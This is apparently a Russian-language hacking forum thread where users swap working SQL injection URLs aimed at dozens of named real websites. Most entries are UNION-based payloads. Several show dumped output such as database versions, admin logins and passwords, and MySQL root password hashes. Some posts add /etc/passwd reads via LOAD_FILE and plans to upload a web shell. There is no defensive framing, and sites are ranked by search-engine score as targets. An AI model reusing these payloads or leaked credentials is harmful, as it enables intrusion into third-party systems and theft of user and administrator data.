SQL Инъекции

Code:

http://weblavka.com.ua/a-imglib/showimg.php?id=-4+union+select+1,2,version%28%29,4,5,6,7,8--

 

http://vd-dosug.ru/ind.php?id_typ=-54+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,26+--+

5.0.32-Debian_7etch6-log:auk:auk@localhost
http://vd-dosug.ru/Admin/
ТИЦ: 20
PR: 1

 

http://www.stoerche-bw.de/cms/comment.php?artikel=-1+union+select+1,2,convert(version()+using+latin1),4,5,6,7,8,9,10,11,12,13,14+--+

 

ТУРФЛОТ

http://www.turflot.ru/menuext.php?menuid=-23+union+select+1,concat_ws(@@version,user(),database(),@@version_compile_os),3,4,5,6,7,8,9+--&Lang=

[email protected]

http://www.turflot.ru/menuext.php?menuid=-23+union+select+1,concat(0x3a,user,password),3,4,5,6,7,8,9+from+mysql.user--&Lang=

 

http://www.raminvestgroup.ru/ta.php?id=79+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10+--+
4.1.25
ТИЦ : 30

http://www.mscg.ru/?mod=l&cat=1&id=6+and+1=0+union+select+1,2,3,4,5,group_concat(schema_name),7,8,9+from+information_schema.schemata--+
ТИЦ : 10

http://www.briz-fm.ru/101/news.php?id_news=15+and+1=0+union+select+1,concat_ws(0x3a,id,login,pass),3,4+from+host6526_7.briz_users_101+limit+0,1--
ТИЦ : 10

http://e-mind.ru/portfolio/?cat_id=3+and+1=0+union+select+1,group_concat(schema_name)+from+information_schema.schemata--+
ТИЦ : 30

http://www.itcenter.ru/0-news-1.html?id=277+union+select+group_concat(table_name),2,3,4+from+information_schema.tables+--+
ТИЦ : 80

 

http://www.govoritmoskva.ru/articles.php?show=all&cat=5+or+(1,1)=(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1+offset+16
),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

большое спасибо Konqi

багу админы уже прикрыли

 

Code:

http://songsofpraise.org/song.php?songid=299-999.9+union+select+1,2,3,4--

ТИЦ 20

 

http://www.jghouse.fi/search.php?type=43+and+1=0+union+select+concat_ws(0x3a,login,password,level)+froM+pmr_admins+--+
ТИЦ : 20
Риэлторские улуги ))

http://www.setevoi.ru/new/mags/index.php?op=article&id=45+and+1=0+UnIon+selECt+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x73657465766f69+--+
ТИЦ : 475 PR: 3
Журнал:Сетевой , для ИТ проффесионалов,нах )

http://www.saabzauto.ru/index.php?news=1+and+1=0+union+select+1,group_concat(schema_name),3,4+from+information_schema.schemata+--+
ТИЦ : 100

 

http://rucoin.ru/top100/stat.php?iduser=-184+union+select+1,2,3,4,5,6,7,concat_ws(0x27,logi n,password,name,privilege),9,10,11,12,13,14,15,16, 17,18,19,20,21,22+from+d_users+limit+1,1

 

http://www.protexin.com/aquatech/news.php?news_id=-2+union+select+1,version()--
мой непосильный вклад)

 

Code:

http://ww2db.com/read.php?read_id=21-999.9+union+select+1,2,3,4,5,6,7,8--

TИЦ 20

Code:

http://mb.shopex.cn/match2008/templatedetails.php?id=118-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

Code:

http://www.theotherjournal.com/article.php?id=452-999.9+union+select+1,2,3,4,5,6--

Code:

http://www.no-smoke.org/learnmore.php?id=645-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

ТИЦ 20

Code:

http://climaterealists.com/index.php?id=3047-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

Code:

http://www.almubadara.org/new/edetails.php?id=6125-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

ТИЦ 10

Code:

http://www.coussouleforcongress.com/index.php?page=pressrelease&content=extended&id=22-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

Code:

http://www.mtexpress.com/index2.php?ID=2005131577-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

ТИЦ 10

Code:

http://climaterealists.com/index.php?id=6294-999.9+union+select+1,2,3,4--

Code:

http://www.modelminority.com/joomla/index.php?option=com_content&view=article&id=322:in-florida-japanese-americans-endure-slurs-echoes-&catid=47:society&Itemid=56-999.9+union+select+1,2,3,4,5--

ТИЦ 10

Code:

http://www.lyricshotspot.com/song.php?sid=47139&aid=13376-999.9+union+select+1,2,3,4--

Повторов нет.

 

www.dynamicchiropractic.ca PR-5

Code:

http://www.dynamicchiropractic.ca/mpacms/dc/article.php?id=-53663+union+select+1,2,3,4,5,6,7,8,9,0,11,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*

Code:

4.1.21-standard:mpacms@localhost:mpacms

www.mta.ca PR-7 ТИЦ-130

Code:

http://www.mta.ca/news/index.php?id=-612+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4+--+

Code:

5.0.77:news@localhost:news

ctvmedia.ca PR-6

Code:

http://ctvmedia.ca/ctv/releases/release.asp?id=10920+or+1=@@version&yyyy=2008

Code:

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

 

PR4

Code:

http://www.ece.uk.com/news.php?newsid=10+and+1=0+union+select+concat_ws(0x3a,loginid,password,type),2,3,4,5+from+adminuser_ece

/admin/

 

http://predict.rediff.com/member_profile.php?mem_id=-118705%20union%20select%201,2,3,4,CONCAT(0x6472385 %20F3838777777333371,LOAD_FILE(0x2F6574632F7061737 377%2064),0x686874666638385F363632),6,7,8,9,10,11, 12,13,%2014,15%20from%20mysql.user

 

http://www.iteam.ru/articles.php?pid=1&tid=2&sid=15&id=118+and+1=0+union+select+1,2,unhex(hex(version())),4,5,6,7+--+
4.1.7-log
ТИЦ:1600

 

онлайн магазин- картон выводить не стал

http://www.31girl.com/shop.php?pid=-1+union+select+1,2,3,4,lastip,6,7,8+from+i31girl_cms.31girlpages+--+

и еще какойто магазин

http://www.witex-rus.ru/shop.php?action=cat&pid=18+and+1=0+union+select+1111,2222,concat(login,char(58),passwd),4444,5555,6666,7777+from+witexru3.dilers+limit+1,1+--+

и еще один магазин

http://www.parador-rus.ru/shop.php?action=price&pid=17&cat=42+and+1=0+union+select+1,2,3,concat(email,char(58),pwd),5,6+from+kameo_polzov+--+


и еще

http://www.appcraft.org/shop.php?pid=45&kid=53+union+select+concat(user,char(58),passwd)+from+user+limit+1,1+--+
результат между тегами- титл

и еще

http://in-green.com.ua/shop.php?pID=4343+and+1=0+union+select+1,2,user_password,4,5,6,7,8,9,10,11,12,13,14,15+from+administrators+--+

 

http://www.avtoweb.com/index.php?sl=history&id=3+and+1=0+union+select+concat_ws(0x3a,converge_pass_hash,converge_pass_salt),2,3+from+avtoweb_forum.ibf_members_converge--+
Нету привелегий на запись шелла в админцентре
ТИЦ : 150 PR: 4

 

http://www.imedea.csic.es/ICG/php/curri.php?id=63009+and+1=0+union+select+1,version()--
PR: 6 Tcy: 20
Database Version: 5.0.51a-3ubuntu5.7
Database name: personal
User name: webman@localhost
OC type: debian-linux-gnu
File_priv: Y
Тащим пароли:
root@localhost:*0CA25A7460DE36F573955BB6CC1037119D430775
debian-sys-maint@localhost:*8555C67D4351FEBBCF51BDDFD449C54C311E0C51
webman@localhost:*A07537A34A4A4C6485AA51D2A3C32973C954D5A6
http://www.imedea.csic.es/phpMyAdmin/index.php - 200 OK

Кое-что интересное:

Итог: есть файловые привилегии, mq=off, путь до сайта можно посмотреть в логах ошибок апача
Льём шелл

 

http://www.turkeyrus.com/rusorgs2.asp?ID=4+union+select+1,2,3+from+msysaccessobjects
http://www.musicolog.com/forum_cevap.asp?ID=889+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+msysaccessobjects
http://www.uniqueturkey.com/page.asp?id=48+union+select+1,2,3,4,5,6+from+msysaccessobjects (column 3 <title></title>)
http://www.sleepandhypnosis.org/article.asp?id=27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+msysaccessobjects
http://www.extreminal.com/extreminal/en/kritik.asp?id=295+union+select+1,2,3,4,5,6,7,8,9,10+from+msysaccessobjects
http://www.egypttourplanner.com/EgyptTour.asp?id=7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+msysaccessobjects

 

Code:

http://www.ekz.de/index.php?id=74%27&tx_pxekzshop[group]=-1000232+UNION+SELECT+1,2,3,4,5,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,7--&cHash=3bd5fc42f3

Username: ekz_de@localhost
Version: 5.1.41-community
Databse: ekz_de

Google PR: 7